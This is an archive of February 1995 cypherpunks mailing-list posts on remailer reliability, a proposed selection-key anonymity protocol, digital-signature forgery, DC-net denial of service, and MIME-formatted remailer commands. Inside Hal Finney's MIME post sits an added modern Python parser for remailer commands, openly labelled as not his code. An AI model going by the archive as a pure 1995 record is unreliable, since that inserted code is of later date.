behaviors as it will have on governments. Maybe more of an effect.

I'm glad to see Rich Dutcher on our list, as we need more folks of
that persuasion. (I can happily coexist with thoughtful leftists who
have some appreciation of the issues--Dave Mandl also comes to mind.
The ones I can't abide are the ignoramuses who blithely speak of
redistributing income and have grade school understandings of markets
and economics. They have no idea of the corporate fascism that comes
from state-run economies. But then the same applies to libertarians
with a lack of understanding.)

> So encrypt away, guys, and I'll keep telling *my* compatriots that no, 
> "the modem in Washington" didn't rig all the vote-counting computers 
> in the last election.  I'm relying on you-all to keep it that way, 
> while others try to make/keep voting meaningful.  It's called 
> division of labor ...

> Rich Dutcher, San Francisco Greens

> "That's libertarians for you - anarchists who want police protection from their slaves."
>                           Kim Stanley Robinson, "Green Mars"

That's a good one! I loved "The Gold Coast" by him, so maybe I'll have
to read this one (though I've skipped the recent crop of "Mars" books).


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 7 Feb 95 02:16:44 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: Is the remailer crisis over?
In-Reply-To: <CeSBlKjqRGfK078yn@mirage.skypoint.com>
Message-ID: <199502071015.CAA26435@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Samuel Kaplin wrote:
> 
> Well folks as of 11:30 on 1-30-94 there are 14 remailers with uptimes
> greater than 99%. What's the consensus...Is the remailer crisis over?
> 

It's great that it's on the upswing again, as it was dipping
pretty low a few weeks back. 

I don't think the "crisis" will be over until there are at least 50
remailers, spread over at least five countries. Each supporting the
usual features, and with some reasonable traffic.

With luck, and with "remailer accounts," this could happen by this
summer.

But it's a good sign.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stig@hackvan.com (Stig)
Date: Tue, 7 Feb 95 02:43:21 PST
To: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Subject: Re: The Rise of "Worse is Better"...
In-Reply-To: <m0rbm8e-0006DaC@hackvan.com>
Message-ID: <m0rbnN3-0006DaC@hackvan.com>
MIME-Version: 1.0
Content-Type: text/plain


L. McCarthy wrote:
> 
> Why did you send this to cypherpunks ?  I don't see any crypto/privacy
> relevance.

No crypto/privacy relevance.  Software methodology relevance.  It makes
points about why it's better to get 50% out the door immediately than to be
overly stuck on doing everything "The Right Way"...

That the "Worse is Better" approach has better survival characteristics than
"The Right Way" approach is applicable to the mission(s) of the cypherpunks
is it not?  Of course, in the case of the cypherpunks, it may be preaching
to the converted and if that is the case, then I apologize...

> Perhaps you're hoping to revive the latest pointless James Donald flame
> war ?

I only subscribe to cp-lite, so I don't have to read all the rehashed
flames.  I suppose that I should be glad that I missed it...

    Stig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 7 Feb 95 02:44:11 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Remailer Scripting Languages
In-Reply-To: <ab54891b070210044757@[132.162.201.201]>
Message-ID: <199502071042.CAA27653@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan Rochkind wrote:

> At 6:55 PM 01/31/95, Robert Rothenberg wrote:
> >Without quoting the entire message, I think a better solution, in terms of
> >ease to implement as well as conserving bandwidth would be to have a
> >sophisticated remailer script-language.
> 
> Yeah, this is really an excellent idea, that I don't see happening any time
> soon. Although of course if anyone wants to write code for such a beast,
> that would be really excellent.  If someone gets around to writing it,
> it'll happen, but it would be a fairly big project, so I wouldn't hold my
> breath.  Safe TCL, anyone?

I certainly support this kind of idea, and have for a long time.
Crypto is well-suited for the "small languages" point of view (and the
competing points of view for object-oriented systems, production
systems, etc.).

Anything to abstract away the grungy details and hide them. TCL and
Perl are steps, and Strick (Henry Strickland) has of course been
working on his Skronk system, which does some of this.

Python is another possibility.

Some of the graphical-oriented languages like Prograph might be
useful. And I still think Smalltalk has promise, as many financial
institutions are using it to model and automate financial
transactions, which have obvious similarities to our crypto projects. 

The real obstacles are time and money. Corporations and banks doing
this work can put several people on these projects for several years,
while most Cypherpunks projects have to be fit in between "Data
Structures 202" and "Ren and Stimpy."

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Mon, 6 Feb 95 14:01:26 PST
To: cypherpunks@toad.com
Subject: Selection key crypto protocol trial balloon
Message-ID: <gate.wJ85Zc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



Before replying to Tim's comments on Mike Ingle's new directions for anonymity
which, I think, are based on a misunderstanding of what Mike was essentially
positing, here's my (slightly lengthy) take on the Selection Key Crypto 
protocol. Please read it before criticising, as I've already done that...

Mp is the plaintext message. Alice encrypts it with Bob's public key:
Mc = E.kpub (M)                                 [1]

She sends Mc to Hermes, the Hoarder of Messages. Hermes also receives 
Alice's identity string (Ia) which will probably be anonymous, but let's 
assume it's not. Now's the tricky bit. Hermes adds Mc to its message store, S:
S' = G (S, Mc)                                  [2]

The key here is G, the Digest function, which has to spread M over S (with a 
variation of the Fourier function, perhaps), and not just append it, so that
the _only_ way it can be extracted is with Bob's selection key, which Bob
transmits to Hermes along with an involuntary identity string (Ib) to get:
Mx = H.ksel (S')                                [3]

where H.ksel is the Regurgitate function applied with Bob's selection key,
and Mx is _not_ the original encrypted message, Mc, nor the plaintext Mp.

Finally Bob decrypts Ms with his _private_ key (or possibly a variation, which
we'll call v(kpri)), to get the plaintext:
Mp = D.v(kpri) (Ms)                                [4]

So the possible crypto operations are:
Mp = D.kpri (E.kpub(Mp))
Mp = D.v(kpri) (Mx)  where v(x) may be = x
Mx = H.ksel (S')
And the Digest function, S' = G (S, E.kpub(Mp))
Note that only the private key kpri, and its variation v(kpri) are private. 
The other two are public.

Now for the obvious criticisms:
1. after [1] Hermes can store Alice's identity (Ia) in a dark grey dossier,
   and match it to Bob's identity (Ib) and the extracted message (Mx). Nope.
   The premise of this scheme is that Mx doesn't look like Mc at all, and that
   G (in [2]) dissolves the original message into a sludge, from which Mx
   somehow emerges, NOT that it chops Mc into bits with Ia on a little nametag
2. after [1] Hermes can store Ia along with the message and feed [Mc, Ia]
   to [2] in the hope that it will reappear in [3] as [Mx, Ia']. Well, the
   digest function has to prevent this, possibly by making the regurgitated
   thing so different from the input that matching Ia to Ia' will be 
   impossible. Of course, Bob probably won't grok [Mx, Ia'] in [4]
3. Hermes gets Bob's identity string (Ib) in [3]. Et alors? As that is 
   incidental, not required to extract the message (unlike in a remailer, where
   that identity string - e-mail address, return block, whatever is _precisely_
   what is required for a message to reach), it's irrelevant. The _real_
   identity is the selection key, which does not correlate to any cyberspatial
   location. See further on traffic analysis.
4. ksel, Bob's selection key, is obviously not private, at least not to Hermes,
   and may as well be public. So anyone can extract the message intended for
   Bob (which reinforces my previous point that Ib is irrelevant). But what
   they extract is Mx, which is not the plaintext. To get the plaintext you
   need not the selection key but Bob's private key, which only Bob has.
5. The Digest function [2-3] has to be robust, i.e. it shouldn't puke if
   it's got lots of messages, and should be able to extract the right one
   in any state. Well, yes, that's tough.

Traffic analysis
The difference between the SKC model and remailers
  Alice --> (Raven, the remailer net) --> Bob   .... multiplied ad infinitum
  Alice --> (Hermes) --> Bob
                     --> Carol, David, the whole world as the 
                         selection key is public
The remailer net is essentially one-to-one, making traffic analysis easier
and limiting Bob's deniability - if the last remailer says it's gone to Bob,
it was _for_ Bob.

The broadcast model essentially increases deniability - they all got it,
any of them could have seen it if they had the key, and you'll only know that
I had the private key with thumb-screws. But they all _get_ it, so bandwidth
is huge.

The SKC model is a compromise. It increases deniability - anyone could have
got it, they all have the selection key, they could only have seen it with the
private key etc. It cuts bandwidth. But it's not a data haven, at least not
as earlier discussed.

The data haven in its latest guise has the same deniability as SKC, and the
same prerequisites that aid recipient protection (anon anon ftp etc). But it
doesn't protect the sender. If the haven is in collusion with remailers that
Alice used to post, it can link her to the message and possibly to Bob. With
SKC, even with the collusion of remailers the link gets lost in digestion.
Also, Bob (or anyone) can frequently extract stuff with the selection key,
perhaps garbage if Hermes is misbehaving or without messages for Bob.

Of course when (and how) Hermes is to expire messages is part of the problem
of the various functions involved.

Comments?


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Tue, 7 Feb 95 06:50:23 PST
To: lce@wwa.com>
Subject: RE: Source code for Applied Cryptography
Message-ID: <Chameleon.4.01.950207065030.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


>I think it's been mentioned that the source code for Bruce
>Schneier's "Applied Cryptography" was available via ftp.  
>
>Would someone be so kind as to post some locations where it can be
>obtained?

This web page isn't the complete set, but points to most of it anyway:

http://www.openmarket.com/info/cryptography/applied_cryptography.html

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov
WWW:                     ftp://ftp.netcom.com/pub/jc/jcorgan/home.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Usenet Autoresponder <usenet@netnet2.netnet.net>
Date: Tue, 7 Feb 95 05:13:54 PST
To: cypherpunks@toad.com
Subject: Re: lwall
Message-ID: <199502071312.HAA26488@netnet2.netnet.net>
MIME-Version: 1.0
Content-Type: text/plain


DO NOT PANIC!  REMAIN CALM!  READ *ALL* OF THIS MESSAGE BEFORE GETTING UPSET!

Your Usenet test article was received here at the news gateway machine for
NetNet, Inc. in Green Bay Wisconsin.  We provide wholesale internet services
for all kinds of services for internet providers and end-users.  From WWW 
pages, newsfeeds, telnet accounts, ppp services, to fully maintained POP's
in your area. 

For sales info please address sales@netnet.net.  Technical and news support to
shane@netnet.net

For an auto-reply of general services and prices email info@netnet.net

If you're a newsadmin and you'd like to run your own autoresponder, this one
is available from ftp://ftp.cccd.edu/pub/usenet/innautorespond.

If you want to suppress this message in the future, include the word "ignore" 
in the Subject: header of any subsequent articles posted to *.test.  You could
also post your test articles with a Distribution: header of "local" to prevent
them from leaving your local machine, or you could also ask your local 
newsadmin to create a local *.test group that will not propagate outside of 
your organization.

There are typically 5 possible reasons why you were sent this e-mail message:

1) You intentionally posted a Usenet news article to a *.test newsgroup.  
These newsgroups exist so you can verify that your articles are being 
propagated correctly.  When your article arrives here, we send you this message
as confirmation.  We will only send you ONE e-mail reply for each of your test
articles that we see.

2) You unintentionally posted a Usenet news article to a *.test newsgroup.  
This is a bit of net.childishness caused by a Followup-To: header directing all
replies into a *.test newsgroup.  This is done by somebody upset with the
content of a discussion thread who wants to "punish" anybody who replies to his
message.  Your reply will be sent to *.test instead of the original newsgroup,
and you will start receiving autoresponder messages similar to this one that
you didn't ask for.  To avoid this in the future, look for a Followup-To:
header and make sure it's appropriate before replying to any articles.

3) You were a victim of a Reply-To: header directing your e-mail into a *.test
newsgroup via a mail->news gateway.  Similar to 2) above.

4) Somebody has forged a posting in your name to one of the *.test newsgroups.
To avoid this in the future, use better net.etiquette and you will make fewer
net.enemies.  If you want to try and identify the forger, use the following
procedure.  Make a legitimate posting to the same *.test newsgroup that the
forger used.  We will send you an e-mail reply.  Compare the Path: header from
this legitimate reply with the Path: header from the forgery.  The front
part of the two headers will be the same or topologically similar path to
your site.  Where the forged header becomes substantially different can
provide clues to where the forger lives.  Note that if you receive multiple
newsfeeds you may need to repeat this process several times so you can discover
all legitimate paths between our site and yours.  Once you think you've
identified the forger's site, try sending POLITE e-mail to the newsadmin/
sysadmin/postmaster explaining the situation.

5) You issued a cancel control message to a *.test newsgroup.  Some users
dislike autoresponses for cancel messages, but the newsadmins here think it
can be a valuable diagnostic tool for verifying cancel propagation.  If you
don't like it, use the "delete" key in your mail client!

All headers plus at most 10 lines of user text from your original article are
reproduced below for your perusal:

questions to shane@netnet.net
complaints to /dev/null

------------------------------- your post follows ----------------------------
Path: netnet2.netnet.net!news.sprintlink.net!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
Subject: lwall
Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
NNTP-Posting-Host: ack.berkeley.edu
Organization: cypherpunks
Lines: 2
From: cypherpunks@toad.com
Distribution: world
Newsgroups: alt.test
Date: 6 Feb 1995 19:34:19 GMT

test
test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 7 Feb 95 04:46:44 PST
To: root <root@einstein.ssz.com>
Subject: Re: dna ink
In-Reply-To: <199502070417.WAA01434@einstein.ssz.com>
Message-ID: <9502071246.AA06847@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



root says:
> This is the same problem that arose with the original idea of seals once
> the skills of metalworking became common enough. By the 1500's it was
> nearly impossible to keep a seal confidential more than a few weeks until
> somebody got an impression and built a copy.

Seals were duplicatable from the start. You just needed clay and a
seal made with the original if you wanted to forge them -- fairly
common stuff. Signatures have been duplicatable from the start, too.

Signatures and seals are NOT truly authenticating technologies. They
are just a legal mechanism for an entity to demonstrate that it has
read and agreed to the terms on a document. It was always assumed that
someone might forge a signature, which is why if you had a document
where you cared that people might disclaim their signature, you got
people who could testify to the signature to witness the signing.

Digital "signatures" are the first real unforgeable authentication
technology mankind has developed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 7 Feb 95 05:22:55 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: Cooperation
In-Reply-To: <9502062043.AA05429@snark.imsi.com>
Message-ID: <9502071321.AA19736@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Mon, 06 Feb 1995 15:43:46 -0500
    From: "Perry E. Metzger" <perry@imsi.com>

    I'd say that it would work far better if things were changed to MIME
    formats. You would send a message by recursively encapsulating your
    message to be remailed inside a MIME message. Simple and clean...

Personally, I vastly prefer that things that can be handled with
header lines be handled that way.

MIME may be general and handle messages with mixed data, but the
Big-Ugly-Block style that everything seems to be moving to is, well,
overly big and overly ugly.

When the data in a message is of a single type, adding all of this
ugly MIME bulk is neither simple nor clean.  It's artificial
complexity and needless blecherousness.

Recursive encapsulation needn't affect how any particular level looks.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lce@wwa.com (Larry E)
Date: Tue, 7 Feb 95 06:34:09 PST
To: cypherpunks@toad.com
Subject: Source code for Applied Cryptography
Message-ID: <sGuDlG9s1Si8075yn@wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


I think it's been mentioned that the source code for Bruce
Schneier's "Applied Cryptography" was available via ftp.  

Would someone be so kind as to post some locations where it can be
obtained?

Thanks for the help.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 7 Feb 95 08:37:19 PST
To: cypherpunks@toad.com
Subject: MIME based remailing commands
Message-ID: <199502071636.IAA15674@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Perry E. Metzger" <perry@imsi.com>
> 
>     I'd say that it would work far better if things were changed to MIME
>     formats. You would send a message by recursively encapsulating your
>     message to be remailed inside a MIME message. Simple and clean...

Here is an example of how such a message might look.  I created it using
the safe-tcl scripting language.  Interestingly, safe-tcl can to a
considerable extent be considered a tcl extension to let you work easily
with mime messages.  It makes it easy to create and parse them.

The whole message could be encrypted and marked with the "Encrypted: PGP"
header as we do now, or when the new PGP/MIME standard is finalized then
that could be followed.

I made up two new content types for this, one to hold the composite
multipart message, and one to hold the remailer commands themselves.
Although these types are not implemented, I think it would be very easy
to make a remailer that would use this structure, built out of safe-tcl.
(The batching and latency would not be trivial, but the basic remailing
would be easy.)

Hal

> To: hfinney@shell.portal.com
> Subject: No subject
> Mime-Version: 1.0
> Content-Type: multipart/remail; boundary="----- =_792174086"
> Content-ID: <1471.792173861.3@cryo>
>  
> ------- =_792174086
> Content-Type: application/remail-commands
> Content-ID: <1471.792173861.1@cryo>
> 
> Latency: 2 hours
> Minimum-Batch-Size: 5 messages
> Anon-Send-To: cypherpunks@toad.com
> Subject: Example of remailed message
>  
> ------- =_792174086
> Content-Type: text/plain
> Content-ID: <1471.792173861.2@cryo>
>  
> This is a message which is being sent to the mailing list.
> It is being remailed via a MIME-based structure where two new content types
> are defined: multipart/remail and application/remail-commands.  The
> multipart/remail type is supposed to be composed of two parts, the
> application/remail-commands part which has remailer commands, and the
> other part which is the "payload" to be remailed.
>  
> ------- =_792174086--
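
A receiving remailer would have to validate this layout before acting on it. The sketch below is an added example, not Hal's safe-tcl code or any remailer's implementation: it parses the multipart/remail structure shown above and fails closed on anything unexpected. The function names, the address pattern, the 24-hour latency ceiling and the "N hours" / "N messages" grammar are assumptions; SAMPLE is a constructed copy of the quoted message with the quoting removed.

```python
"""Parse a multipart/remail message (layout from the post above); fail closed."""
import email
import re

UNITS = {"second": 1, "minute": 60, "hour": 3600}
ALLOWED = {"latency", "minimum-batch-size", "anon-send-to", "subject"}
MAX_LATENCY = 24 * 3600  # assumed operator policy, not from the post
ADDR = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+")  # assumed, deliberately strict

class RemailError(ValueError):
    """Raised for any message the remailer should drop instead of forwarding."""

def duration(text):
    m = re.fullmatch(r"(\d+) (second|minute|hour)s?", text.strip())
    if not m:
        raise RemailError("bad Latency: %r" % text)
    seconds = int(m.group(1)) * UNITS[m.group(2)]
    if seconds > MAX_LATENCY:
        raise RemailError("Latency exceeds policy")
    return seconds

def batch_size(text):
    m = re.fullmatch(r"(\d+) messages?", text.strip())
    if not m:
        raise RemailError("bad Minimum-Batch-Size: %r" % text)
    return int(m.group(1))

def parse_remail(raw):
    msg = email.message_from_string(raw)
    if msg.get_content_type() != "multipart/remail" or not msg.is_multipart():
        raise RemailError("not a multipart/remail message")
    parts = msg.get_payload()
    if len(parts) != 2:
        raise RemailError("expected exactly a command part and a payload part")
    commands_part, payload_part = parts
    if commands_part.get_content_type() != "application/remail-commands":
        raise RemailError("first part must be application/remail-commands")
    # The command block is header-shaped, so the header parser can read it.
    cmds = email.message_from_string(commands_part.get_payload())
    if cmds.get_payload().strip():
        raise RemailError("unparsed data after the command lines")
    names = [k.lower() for k in cmds.keys()]
    if len(names) != len(set(names)) or not set(names) <= ALLOWED:
        raise RemailError("duplicate or unknown command")
    recipient = cmds.get("Anon-Send-To", "").strip()
    if not ADDR.fullmatch(recipient):  # also rejects folded lines (header injection)
        raise RemailError("missing or malformed Anon-Send-To")
    subject = cmds.get("Subject", "").strip()
    if "\n" in subject or "\r" in subject:
        raise RemailError("folded Subject rejected")
    nested = payload_part.get_content_type() == "multipart/remail"
    # Only the payload and the commanded Subject go onward; the outer
    # To/Subject/Content-ID headers that identify the sender's hop are dropped.
    return {
        "recipient": recipient,
        "subject": subject,
        "latency": duration(cmds.get("Latency", "0 seconds")),
        "min_batch": batch_size(cmds.get("Minimum-Batch-Size", "1 message")),
        "nested": nested,  # True when the payload is another layer for the next hop
        "body": payload_part.as_string() if nested else payload_part.get_payload(),
    }

# Constructed sample: the message from the post with the "> " quoting removed.
SAMPLE = """\
To: hfinney@shell.portal.com
Subject: No subject
Mime-Version: 1.0
Content-Type: multipart/remail; boundary="----- =_792174086"

------- =_792174086
Content-Type: application/remail-commands

Latency: 2 hours
Minimum-Batch-Size: 5 messages
Anon-Send-To: cypherpunks@toad.com
Subject: Example of remailed message

------- =_792174086
Content-Type: text/plain

This is the "payload" to be remailed.

------- =_792174086--
"""

if __name__ == "__main__":
    print(parse_remail(SAMPLE))
```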




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jason cooper <jcooper@acs.ucalgary.ca>
Date: Tue, 7 Feb 95 07:45:14 PST
To: Stig <stig@hackvan.com>
Subject: Re: The Rise of "Worse is Better"...
In-Reply-To: <m0rbm8e-0006DaC@hackvan.com>
Message-ID: <Pine.3.89.9502070839.B31143-0100000@acs6.acs.ucalgary.ca>
MIME-Version: 1.0
Content-Type: text/plain


I like.  I guess I'm basically in with the New Jersey crowd.  Anybody 
else?

-----------------------------------------------------------------
  "The meek shall inherit the earth...   Fortunately, the rest of
us will upgrade to the new version, which is supposed to come out
later this year."
 
Jason Cooper                              jcooper@acs.ucalgary.ca






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@tower.techwood.org (Anonymous)
Date: Tue, 7 Feb 95 09:09:02 PST
To: cypherpunks@toad.com
Subject: Re: Is the remailer crisis over?
In-Reply-To: <199502071015.CAA26435@netcom9.netcom.com>
Message-ID: <199502071708.JAA17106@tower.techwood.org>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@netcom.com (Timothy C. May) wrote:

> I don't think the "crisis" will be over until there are at least 50
> remailers, spread over at least five countries. Each supporting the
> usual features, and with some reasonable traffic.
> 
> With luck, and with "remailer accounts," this could happen by this
> summer.

I think the increase in remailers is partly due to better
protection/privacy/anonymity for remailer operators, which is a good
thing, but I worry about putting all our eggs in one basket.  Nearly 40%
of the remailers now are either on c2.org or through John Perry's and
Matt Ghio's MXing thing.  I don't know much about the latter, but
Sameer's net connection is not very reliable and disconnects frequently.
 It seems these two points of failure could cause serious problems for
the remailer network as a whole.  Not to mention that these two systems
would be prime targets for anyone who wants to do traffic analysis...

The remailer crisis is far from over.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Keith Henson <keith@filoli.com>
Date: Tue, 7 Feb 95 09:53:15 PST
To: cypherpunks@toad.com
Subject: Re: dna ink
Message-ID: <199502071740.JAA26640@mentat.filoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Re signing in blood, I heard last year that the Army is requiring
a drop of blood on enlistment papers.  It is not some kind of pact
with the devil :-) but if all they ever find of you is a wrist 
bone, they want to be able to match DNA.  Keith





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Katy Kislitzin <ktk@anemone.corp.sgi.com>
Date: Tue, 7 Feb 95 10:32:33 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: preliminary cypherpunks announcement
In-Reply-To: <199502070311.WAA03160@bwh.harvard.edu>
Message-ID: <199502071830.KAA29964@anemone.corp.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Adam Shostack <adam@bwh.harvard.edu>
 > Is the march meeting scheduled yet?  I'm trying to plan to be out for
 > both CFP & the cypherpunks meeting, but have paid no attention to when
 > they're held, since I live on the wrong coast to attend most of them.
 > 
 > Adam
 > 
 > -- 
 > "It is seldom that liberty of any kind is lost all at once."
 > 						       -Hume

 We have the usual 2nd Saturday (March 12) meeting planned, but I
 *definitely* think cpunks should do something around the cfp
 conference.  last year we did an informal in-the-hotel-halls meeting,
 but since this cfp is in the bay area....  I propose keeping the
regular March and April mtgs, and adding a cpunks dinner &&|| BOF at
cfp.  other ideas?

--kt
 ps CFP is March 28-31, at the sf airport marriot in burlingame ca.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Tue, 7 Feb 95 11:57:38 PST
To: rrothenb@ic.sunysb.edu
Subject: dna ink
In-Reply-To: <199502061003.FAA01784@libws4.ic.sunysb.edu>
Message-ID: <199502071902.LAA27173@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu> writes:

> ...probably will be until DNA cloning becomes cheap and accessible...

Can you say "Polymerase Chain Reaction"?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 7 Feb 95 11:28:01 PST
To: cypherpunks@toad.com
Subject: Re: dna ink
In-Reply-To: <9502071246.AA06847@snark.imsi.com>
Message-ID: <199502071926.LAA21751@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Perry E. Metzger" <perry@imsi.com>

   Digital "signatures" are the first real unforgeable authentication
   technology mankind has developed.

Impossibility is a pretty strong concept, and here, as elsewhere, it's
an exaggeration.  Digital signatures are not unforgeable.  If you
steal the private key, you can forge signatures.  The unforgeability
is exactly as great as the strength of the container where the private
key lies.  The issue of incarnation, if you will, is perhaps the
single most important issue for actual deployment.

It's a matter of economics.  The cryptographic barrier is
insurmountable, but it's not the only barrier.  So don't try to breach
the cryptography; try to breach one of the other elements of the
system.

[Perry, I promise it's not personal; it just _seems_ like I'm
nit-picking on everything you write this week.]

A remark on the meaning of forgery.  Let me rewrite what Perry said:

   Digital "signatures" are the first authentication technology
   mankind has developed where forgery is impossible to detect.
   
An indistinguishable signature can still be a forged signature.  A
forged signature is one that is made by the wrong person.  If the
wrong person gets the private key, signatures made by that person are
forgeries, even though nobody can tell them apart.

This point is not merely pedantic.  The concept of forgery adheres to
the person committing the act, not the act itself.  A piece of data
which presents itself as a signature, but which does not pass the
verification process, is not a forged signature but an invalid one.

The external inability to distinguish proper digital signatures from
forged ones has profound effect on the legal interpretations of the
physical signing device (hardware+software).  I wish only to point
this out and leave discussion to another thread.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 7 Feb 95 09:37:02 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: (dis)advantages of DC-Net vs remailers
Message-ID: <9502071736.AA00821@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  And when you try to figure how to deal with denial of service
>  attacks in a big DC net that tries to use bandwidth with tolerable
>  efficiency -- I don't know if anyone has figured out what would be
>  involved -- I certainly have not.

The bandwidth is the easy part.  Building clients that do a DC protocol with  
real-world reliability and resistance to denial of service is the hard part.   
And doing all this in a package that would be easy to get people to use is  
probably the hardest part.

The only way I know of to deal with denial of service is for everyone to  
reveal their flips and kick the attackers out of the net.  However, if  
someone is legitimately transmitting that round they lose their  
untraceability.  So pretty much the only way to do it is ensure that only one  
participant has permission to transmit and that the participant with  
permission gets to decide if everyone shows their hands.

A way to do this would be to have a separate reservation phase of the  
protocol.  In the reservation phase all of the participants 'bid' on a token.  
 Whoever gets the token has permission to transmit during that round.  If  
collisions have been occurring, the participant holding the token can demand  
that everyone reveal their flips.  I think there is a paper describing a  
protocol for this, but I don't have access to a library with crypto material.

The protocol for distributing the token would be somewhere between an  
All-Or-Nothing-Disclosure-Of-Secrets and a poker card dealing protocol.  Only  
one person should be able to get the token and nobody should know who got it.  
 To make it more complicated, for people to be able to transmit in a timely  
fashion, you should be able to specifically request the token when you want  
it (so you would have a 1/n chance of getting it with n being the total  
number of participants wanting to transmit that round), and not have any  
chance of getting it when you don't want to transmit.  In addition the  
generation of the token(s) should be secure so that none of the participants  
have to trust anyone that only one participant can get a valid transmit  
token.

I can think of a way to do this with a mental poker protocol.  The only  
problem is there is always a 1/n chance of getting the transmit token (where  
n is the total number of participants), whether you want it or not.  I  
believe it also requires some trust in the 'dealer'...  Anyway, the deck  
would consist of 1 transmit token and n-1 blank tokens.  Immediately after  
the transmit phase the participant holding the token can optionally demand  
that everyone reveal their flips.  To do that the participant would reveal  
their valid transmit token.  At that point everyone else would reveal their  
blank transmit tokens (to make sure there are no duplicates).  If anyone  
refuses to reveal their blank token, they are removed from the net.  Once  
it's been determined that there is only one valid transmit token, everyone  
reveals their flips.

In theory all of this stuff would work, but implementing it is a different  
story.  For a DC net to be practical, it would have to run completely without  
human intervention.  Maybe a client could be placed in your .login or shell  
rc file and would run in the background whenever you were logged in.  It  
could keep running after you logged out if you had a message in your queue to  
be sent out.  Clients must be smart enough to synchronize rounds and remove  
participants who aren't responding fast within time-outs, etc...   
automatically attempt to 'lay a trap' when collisions have been occurring,  
figure out who is disrupting or not following protocol and remove them or  
alternately have the client drop out of the DC-Net when protocol hasn't been  
followed to satisfaction (duplicate tokens in one round, etc...), etc...

Quite a tall order, and for how much more untraceability than the current  
remailer system?  Even if it is implemented you still have to get people to  
use it.  The current remailer system can be used with no software  
whatsoever...

Still, it's an interesting prospect, as it offers real sender and receiver  
untraceability within the group of participants.  But is it worth it?


(apologies for the length...)
